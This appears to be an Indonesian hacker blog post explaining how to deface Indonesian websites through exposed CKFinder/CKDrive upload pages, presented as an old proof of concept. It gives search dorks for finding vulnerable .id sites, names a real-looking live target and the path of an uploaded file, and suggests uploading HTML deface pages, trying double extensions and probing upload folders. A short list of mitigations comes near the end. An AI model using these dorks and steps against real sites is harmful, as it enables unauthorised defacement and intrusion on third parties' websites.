🎯 Deface site indo dengan CKFinder – POC Lama
🕶️ Pendahuluan
CKFinder/CKDrive. Walau ini bug jadul, tetep aja lumayan buat nambah mirror archive. 😆
🔎 Dork
Biasanya gue pake dork:
site:.id inurl:ckfinder.html site:.id inurl:ckfinder site:.id inurl:ckdrive site:.id "ckfinder" "type=Images"
kembangkan biar dapat yang fresh
exploit:
site.co.li/_statics/ckdrive/ckfinder.html
Live Target:
https://el-ma-asda.com/__statics/ckdrive/ckfinder.html
aksesnya
https://el-ma-asda.com/__statics/gudangsoal/files/s.txt(s.txt nama fileny)
Walau cuma bisa
.txt
, tapi udah cukup buat nambah list mirror wkwk
⚡ Eksplorasi yang Bisa Dicoba
- Upload
.html
→ kalau bisa, langsung bikin custom deface page ala newbie bangga :v. - Coba double extension kayak
index.php.txt
. - Ngintip folder default:
/files/
,/uploads/
,/userfiles/
.
🛡️ Mitigasi (andai Saia Jadi Admin wkwk)
Jangan cuma bisa attack doang, brok. Bayangin kalo jadi admin, gue bakal:
- Nutup akses publik ke
ckfinder.html
. - Bikin upload khusus user yang login aja.
- Filter extension & MIME type biar ga asal masuk.
- Pindahin folder upload jauh dari root publik.
Baca juga artikel: exploit joomla full pack
🧩 Kesimpulan
Bug ini mungkin keliatan receh, tapi buat nambah ilmu lumayanlah Dari sini gue ngerti kalo deface itu bukan cuma soal nulis nickname di web, tapi juga soal eksplorasi & belajar sistem di balik layar. 🔥
Posting Komentar